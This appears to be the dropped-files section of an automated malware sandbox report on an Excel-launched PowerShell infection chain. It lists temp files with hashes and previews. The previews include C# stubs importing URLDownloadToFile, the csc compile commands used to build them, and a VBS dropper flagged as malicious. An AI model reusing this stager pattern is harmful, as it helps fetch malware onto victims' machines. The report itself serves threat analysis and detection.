                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                                                                    Entropy (8bit):3.1005663540773236
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grytZak7YnqqkuPN5Dlq5J:+RI+ycuZhNPZakSkuPNnqX
                                                                                                                                                                                                                    MD5:4AC8B6D3B6601A11CC18EA93B29F58DC
                                                                                                                                                                                                                    SHA1:49FAD11CE350F945A68AB1788914C2DE653BE573
                                                                                                                                                                                                                    SHA-256:E637CF080BBC621CD21820072CA443BC1C01BF308B0699E77952EA7F200C6AA4
                                                                                                                                                                                                                    SHA-512:50D9675F8C90880DE3298CA8B0114572F03FBD44033FB05C2ABA26AB2E3B17BCCCB20FFB40B6B514852B8510BE64D67D7038F31B21F329E90A9EFFCA25BC4406
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.k.z.g.b.m.k.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.k.z.g.b.m.k.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.0.cs

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):479
                                                                                                                                                                                                                    Entropy (8bit):3.822048982650369
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:V/DsYLDS81zuQ48QmMCQXReKJ8SRHy4Ht4gNybCFPTlNgYT3/Qy:V/DTLDfuQ4jXfHp9Nybcx6/y
                                                                                                                                                                                                                    MD5:BDE88A612A03E923DA5AB7EA68AEC3C7
                                                                                                                                                                                                                    SHA1:794B2B8DAFAC37753258A45CCFD9D07647D6B3E2
                                                                                                                                                                                                                    SHA-256:2130C7B5A1D3CC5B571622ABF744C66265C625E805EBF608006BB169439922FC
                                                                                                                                                                                                                    SHA-512:AB2550558A98FAFE1BCFFC9260D7E8DABDBEB85CD23E291D46161AADC86CBFC853CC0DD3538729ACDCA0402496E94C71F7BC08A85E09BBDC0DF153978B5A78C1
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace ThScHUII.{. public class D. {. [DllImport("uRLmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr tMYmJgj,string mFyVMhW,string ezXEPj,uint ZeixdZoVD,IntPtr mulcefBZ);.. }..}.

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):369
                                                                                                                                                                                                                    Entropy (8bit):5.233440390315943
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fXBUzxs7+AEszIP23fXV9:p37Lvkmb6KzOWZEot9
                                                                                                                                                                                                                    MD5:BCC6822CEC1CA517FE5DB825DDAF458B
                                                                                                                                                                                                                    SHA1:4867E4DE19F70A9033A65F5399317F5B4B213F11
                                                                                                                                                                                                                    SHA-256:879AEE982D8E336AA8821F1F1E90031DD51D7C2396892CFB039E2E44406D4E5E
                                                                                                                                                                                                                    SHA-512:09887452AF2643CF5F52AA5855720E5D414F8B15B77268509CA4CEC82D45FE28D69541C0116A5349A74DA4A6300A4F485C358A10FB8255B88EC790BB34B7AD78
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.0.cs"

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.dll

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                    Entropy (8bit):2.840470602898936
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:6llFskr+lUtvCUvDJZVbCZX1ulPZa3kyq:8jiGaVedZKk
                                                                                                                                                                                                                    MD5:DDE87593A0752A17F4A4B1D801F32A1C
                                                                                                                                                                                                                    SHA1:50E9D38A830754251B52FDB1BEC706C848AE9B5D
                                                                                                                                                                                                                    SHA-256:515853DEE219753C535079CBC5868857B0B2D2A977E9A2D6C20628EDC717DFBF
                                                                                                                                                                                                                    SHA-512:F1E3CC6F817CECD4A0A883C2DCFB58C08C3D5CD9FCFEC7AB2FF2562F0E2579517011EFA4925E18CF2BC32EB1E268BBF5A0434633E2E6178997A4912E2BF96FED
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v2.g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....{.....{.......................................... 9.....P ......K.........Q.....Y.....a.....h.....r...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.lk

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.out

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                    Size (bytes):866
                                                                                                                                                                                                                    Entropy (8bit):5.3425022484268085
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:AId3ka6KzPEot4KaMD5DqBVKVrdFAMBJTH:Akka60PEot4KdDcVKdBJj
                                                                                                                                                                                                                    MD5:56786F37F8D0BF00E2471D9E4C966BAD
                                                                                                                                                                                                                    SHA1:B661B5D36717F1C1C07CB5E065D0CCC7ACB4127F
                                                                                                                                                                                                                    SHA-256:1F112E515DB2ACE83380AC69B7BD4EC61949A0015C21EED718452AC5951BB8F9
                                                                                                                                                                                                                    SHA-512:136F716C121B42F89AC4FD607E3F624177062A3AE24285CDBA9171E71790540E5912A33B96D7B9E4856A757B1D0DE76F2D24B487D7E958103153E61222E8E1F4
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\n1ccr2y2.akp.psm1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\utntlsat.iha.psm1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                                                                    Entropy (8bit):3.1039241208595985
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRak7YnqqlPN5Dlq5J:+RI+ycuZhNjakSlPNnqX
                                                                                                                                                                                                                    MD5:75DBB5D08F27105A063CB68C37400DB1
                                                                                                                                                                                                                    SHA1:85957F276EED13B0BA74CA8D4787B23BC8A5C81F
                                                                                                                                                                                                                    SHA-256:DF6C29551E7A38BCED0CD9A2FB1EF35C35C7567CF8BA474F701D02051BCCC41C
                                                                                                                                                                                                                    SHA-512:B022E9E331B66F38E0015C28BE888C5BBF47724AA6D78B8CF325171E5DD2D670E7ED862EA37B226975CF710C09DC4969BAC52B641B3FD13245D45E5F229F0D7C
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.v.r.r.k.y.h.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.v.r.r.k.y.h.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.0.cs

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):479
                                                                                                                                                                                                                    Entropy (8bit):3.822048982650369
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:V/DsYLDS81zuQ48QmMCQXReKJ8SRHy4Ht4gNybCFPTlNgYT3/Qy:V/DTLDfuQ4jXfHp9Nybcx6/y
                                                                                                                                                                                                                    MD5:BDE88A612A03E923DA5AB7EA68AEC3C7
                                                                                                                                                                                                                    SHA1:794B2B8DAFAC37753258A45CCFD9D07647D6B3E2
                                                                                                                                                                                                                    SHA-256:2130C7B5A1D3CC5B571622ABF744C66265C625E805EBF608006BB169439922FC
                                                                                                                                                                                                                    SHA-512:AB2550558A98FAFE1BCFFC9260D7E8DABDBEB85CD23E291D46161AADC86CBFC853CC0DD3538729ACDCA0402496E94C71F7BC08A85E09BBDC0DF153978B5A78C1
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace ThScHUII.{. public class D. {. [DllImport("uRLmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr tMYmJgj,string mFyVMhW,string ezXEPj,uint ZeixdZoVD,IntPtr mulcefBZ);.. }..}.

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):369
                                                                                                                                                                                                                    Entropy (8bit):5.269401370646196
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fCd6/+zxs7+AEszIP23fCd6QA:p37Lvkmb6Kz6d9WZEo6dY
                                                                                                                                                                                                                    MD5:5BE641F3BC91A079812877F12E229712
                                                                                                                                                                                                                    SHA1:BD762B2A73FC70E28581C593AE8CC29DE975B408
                                                                                                                                                                                                                    SHA-256:3E30A2398D35947AB0B5CDB78A678A83B3A5448A4DBF19ED6C6608A3B2E87A39
                                                                                                                                                                                                                    SHA-512:1082A15C3896B89D7A084A48F39D32A1C4972F457C4F2C1BCE08B76C7F337316953CB48302EBB838F1306348EEE4DDDF27CCD679475A9F85E935E2A4FE8A2824
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.0.cs"

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.dll

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                    Entropy (8bit):2.838716538662028
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:6qlFskr+lUtvCUXDJH1kbCZX1ulja3/q:djiGa6eBK
                                                                                                                                                                                                                    MD5:99A69E724ED32841148124B6F6E9EC9E
                                                                                                                                                                                                                    SHA1:D9D3D204885C48C97DC5714F423051FF48E72228
                                                                                                                                                                                                                    SHA-256:FFD61AD696E541191922E248CA9BF2CEF359DBAB542B7EFF7E4124E53AA8ADDB
                                                                                                                                                                                                                    SHA-512:2CB3559B699D4CA61620CF090CEFB8B67F7DEA423552A1F22AAE45A8D1690A5B7CE24862908C260CF73F894C294ECF5E21FB2C582E8F1724A43EAFFA2240B962
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c2.g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....{.....{.......................................... 9.....P ......K.........Q.....Y.....a.....h.....r...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.uv

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.out

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                    Size (bytes):866
                                                                                                                                                                                                                    Entropy (8bit):5.328942012999451
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:AId3ka6Kz6QEo6fKaMD5DqBVKVrdFAMBJTH:Akka60fEoyKdDcVKdBJj
                                                                                                                                                                                                                    MD5:35CBCC39A53EAAC9E8DF342815FBBEE5
                                                                                                                                                                                                                    SHA1:E7E410760AD2626E8EFCB56D5BB9611B6ACFC636
                                                                                                                                                                                                                    SHA-256:4D5CD19922A66979BA72CA71936B762C7856698DCB032695E70C68726C997995
                                                                                                                                                                                                                    SHA-512:85FCD2B818E31AA5A059DBCBE16C5167562ACF80242B1401E58FE0DB05C4E8E291EC2D000B695DE279E914EE75A99D62840A590DC8168A32EA9C93E0EBFC2CD2
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\vyubxzps.w4d.psm1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\yd20fzhg.x0b.ps1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\zw52xona.xi3.psm1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF6DB3E13BAF41239C.TMP

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF956B7095E76C06D2.TMP

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF9D547381441752C0.TMP

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):195560
                                                                                                                                                                                                                    Entropy (8bit):3.7210597034966684
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3072:kXvVPVWplSFblsHb6LBgt5poGwNqmM5pfir3RkQ5Pxl5Ax3pTgROVnjRv:qVPVWpy5sHGXqj2Z5Luh9eOVjRv
                                                                                                                                                                                                                    MD5:FFA76C6571F4F3D4E5E256586A8390B6
                                                                                                                                                                                                                    SHA1:00854060B1673D298068AAF9248129EFE750EB93
                                                                                                                                                                                                                    SHA-256:9E97607E9FB8CA4C56D9754B0A6D3FCD24B9816DC62DE63BE73869B17E5E8B24
                                                                                                                                                                                                                    SHA-512:ADC073AEE0AA3C6C7F6BF08606D616BF64F7ECBFA9A095361185DF8D041998505D044306AF933482F11DC6D5D484154954CB315AC8E767DAD19094F9BDDB2C2A
                                                                                                                                                                                                                    Malicious:true
